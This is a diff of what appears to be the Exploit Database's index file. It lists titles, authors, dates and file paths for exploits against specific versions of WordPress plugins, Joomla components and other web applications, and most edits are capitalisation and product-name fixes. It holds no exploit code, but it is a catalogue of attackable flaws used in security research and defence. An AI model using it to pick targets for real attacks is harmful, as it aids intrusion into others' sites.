36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -40870,platforms/php/webapps/40870.txt,"Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps,0 +40870,platforms/php/webapps/40870.txt,"WordPress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps,0 36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 @@ -34795,7 +34797,7 @@ id,file,description,date,author,platform,type,port 36589,platforms/php/webapps/36589.txt,"Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 36591,platforms/php/webapps/36591.txt,"Joomla! Component 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36592,platforms/php/webapps/36592.txt,"Joomla! Component 'com_sanpham' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36592,platforms/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 36593,platforms/php/webapps/36593.txt,"Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 36594,platforms/php/webapps/36594.txt,"Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 @@ -34815,7 +34817,7 @@ id,file,description,date,author,platform,type,port 36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 -36618,platforms/php/webapps/36618.txt,"Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36618,platforms/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 @@ -34849,7 +34851,7 @@ id,file,description,date,author,platform,type,port 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 36657,platforms/php/webapps/36657.txt,"Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 -36659,platforms/php/webapps/36659.txt,"Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 +36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0 @@ -34858,7 +34860,7 @@ id,file,description,date,author,platform,type,port 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 -36674,platforms/php/webapps/36674.txt,"Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 +36674,platforms/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 36677,platforms/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 @@ -35141,11 +35143,11 @@ id,file,description,date,author,platform,type,port 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php' redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 -37253,platforms/php/webapps/37253.txt,"Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 +37253,platforms/php/webapps/37253.txt,"WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 -37101,platforms/php/webapps/37101.txt,"Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 +37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 @@ -35157,7 +35159,7 @@ id,file,description,date,author,platform,type,port 37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 37111,platforms/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 37112,platforms/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 -37113,platforms/php/webapps/37113.txt,"Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 +37113,platforms/php/webapps/37113.txt,"WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 @@ -35199,24 +35201,24 @@ id,file,description,date,author,platform,type,port 37166,platforms/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0 37174,platforms/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37176,platforms/php/webapps/37176.txt,"Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37176,platforms/php/webapps/37176.txt,"WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37177,platforms/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37178,platforms/php/webapps/37178.txt,"Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37179,platforms/php/webapps/37179.txt,"Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37178,platforms/php/webapps/37178.txt,"WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37179,platforms/php/webapps/37179.txt,"WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37180,platforms/php/webapps/37180.txt,"WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 37182,platforms/php/webapps/37182.txt,"WordPress Plugin LeagueManager 3.9.11 - SQL Injection",2015-06-02,javabudd,php,webapps,0 -37189,platforms/php/webapps/37189.txt,"Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37190,platforms/php/webapps/37190.txt,"Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37189,platforms/php/webapps/37189.txt,"WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37190,platforms/php/webapps/37190.txt,"WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37193,platforms/php/webapps/37193.txt,"Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37194,platforms/php/webapps/37194.txt,"Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37193,platforms/php/webapps/37193.txt,"WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37194,platforms/php/webapps/37194.txt,"WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37196,platforms/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37200,platforms/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 37201,platforms/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37202,platforms/php/webapps/37202.txt,"Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37202,platforms/php/webapps/37202.txt,"WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37204,platforms/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 @@ -35791,7 +35793,7 @@ id,file,description,date,author,platform,type,port 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 -38176,platforms/php/webapps/38176.txt,"Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 +38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 @@ -35962,8 +35964,8 @@ id,file,description,date,author,platform,type,port 38523,platforms/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,php,webapps,0 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market - Multiple Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 -38527,platforms/php/webapps/38527.txt,"Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0 -38528,platforms/php/webapps/38528.txt,"Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0 +38527,platforms/php/webapps/38527.txt,"Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0 +38528,platforms/php/webapps/38528.txt,"Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0 38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0 38534,platforms/php/webapps/38534.php,"Joomla! 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps,0 @@ -36005,7 +36007,7 @@ id,file,description,date,author,platform,type,port 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 -38608,platforms/php/webapps/38608.txt,"Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38608,platforms/php/webapps/38608.txt,"WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38630,platforms/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 38621,platforms/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38624,platforms/php/webapps/38624.txt,"WordPress Plugin WP Feed - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 @@ -36015,7 +36017,7 @@ id,file,description,date,author,platform,type,port 38642,platforms/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38635,platforms/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0 38638,platforms/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0 -38639,platforms/php/webapps/38639.txt,"Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 +38639,platforms/php/webapps/38639.txt,"WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38641,platforms/multiple/webapps/38641.rb,"JSSE - SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38643,platforms/php/webapps/38643.txt,"WordPress Plugin Pie Register - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 @@ -36215,7 +36217,7 @@ id,file,description,date,author,platform,type,port 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 39016,platforms/php/webapps/39016.txt,"Joomla! Component 'com_aclassfb' - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 -39028,platforms/php/webapps/39028.txt,"Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 +39028,platforms/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -36243,7 +36245,7 @@ id,file,description,date,author,platform,type,port 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 -39088,platforms/php/webapps/39088.txt,"Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 +39088,platforms/php/webapps/39088.txt,"Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39090,platforms/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - 'code.php' Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 @@ -36266,7 +36268,7 @@ id,file,description,date,author,platform,type,port 39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 -39133,platforms/php/webapps/39133.php,"Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 +39133,platforms/php/webapps/39133.php,"WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39135,platforms/php/webapps/39135.php,"WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 @@ -36527,7 +36529,7 @@ id,file,description,date,author,platform,type,port 39752,platforms/php/webapps/39752.txt,"WordPress Plugin Ghost 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 -39761,platforms/php/webapps/39761.txt,"Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 +39761,platforms/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0 @@ -36549,7 +36551,7 @@ id,file,description,date,author,platform,type,port 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80 39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 -39848,platforms/php/webapps/39848.py,"Wordpress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 +39848,platforms/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection)",2016-05-24,"Mehmet Ince",asp,webapps,80 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80 @@ -36614,7 +36616,7 @@ id,file,description,date,author,platform,type,port 39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 39977,platforms/php/webapps/39977.txt,"Joomla! Component 'com_bt_media' - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 -39978,platforms/php/webapps/39978.php,"Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 +39978,platforms/php/webapps/39978.php,"WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80 39982,platforms/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 @@ -36861,10 +36863,10 @@ id,file,description,date,author,platform,type,port 40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0 40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0 40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0 -40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 -40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 -40782,platforms/php/webapps/40782.txt,"Wordpress Plugin BBS e-Franchise 